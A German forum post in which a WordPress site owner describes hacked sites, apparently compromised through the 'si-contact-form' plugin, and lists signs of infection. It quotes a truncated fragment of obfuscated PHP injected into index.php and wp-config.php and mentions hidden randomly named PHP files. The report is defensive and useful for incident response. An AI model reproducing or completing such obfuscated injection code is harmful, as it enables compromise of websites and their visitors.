Achtung !!! Seiten gehackt !

Hallo zusammen,
ich musste in den letzten Tagen feststellen, das mehrere meiner Seiten gehackt wurden, und schließlich mit einen „Access denied“ ausfielen.
Ich bin über ftp reingegangen und habe nach etlichen Recherchen folgendes festgestellt:
1) bei allen Seiten war das Modul „si-contact-form“ installiert, was möglicherweise kompromitiert ist.
2) die Dateien „index.php“ und „wp-config.php“ wurden mit Einträgen ergänzt, die folgendermaßen aussehen:
`$h671 = 320;$GLOBALS[‚l4b7a13e‘] = Array();global $l4b7a13e;$l4b7a13e = $GLOBALS;${„\x47\x4c\x4fB\x41\x4c\x53“}[‚u06c55‘] = „\x42\x40\x74\x79\x24\x43\x2f\x45\x46\x73\x72\x34\x4f\x75\x53\x71\x65\x28\x37\xa\x49\x62\x2a\x2….`; davor ein „Silence is golden“
Die index.php ist auf einmal 16KB groß statt wenigen Bytes
Es gibt auch noch andere Einträge, die nicht dorthin gehören. Diese sind kürzer, laden aber ebenfalls irgendwelche externen Dateien nach.
3) Weiterhin befinden sich etliche Datein im Web, weit verteilt, die als Berechtigung nur ein -w———- haben (200) und nicht gelöscht werden können, ohne die Berechtigungen zu ändern.
4) Es befinden sich weit verzweigt Datein mit kryptischen Namen, wie „fgjkltd4e.php“ (Beispiel) in web, die dort nicht hingehören…

Meine Seiten, die das obene beschriebene Modul nicht nutzen, sind auch nicht betroffen.

• Dieses Thema wurde geändert vor 5 Jahren, 8 Monaten von Thomas.
• Dieses Thema wurde geändert vor 5 Jahren, 8 Monaten von Bego Mario Garde.
• Dieses Thema wurde geändert vor 5 Jahren, 8 Monaten von Bego Mario Garde.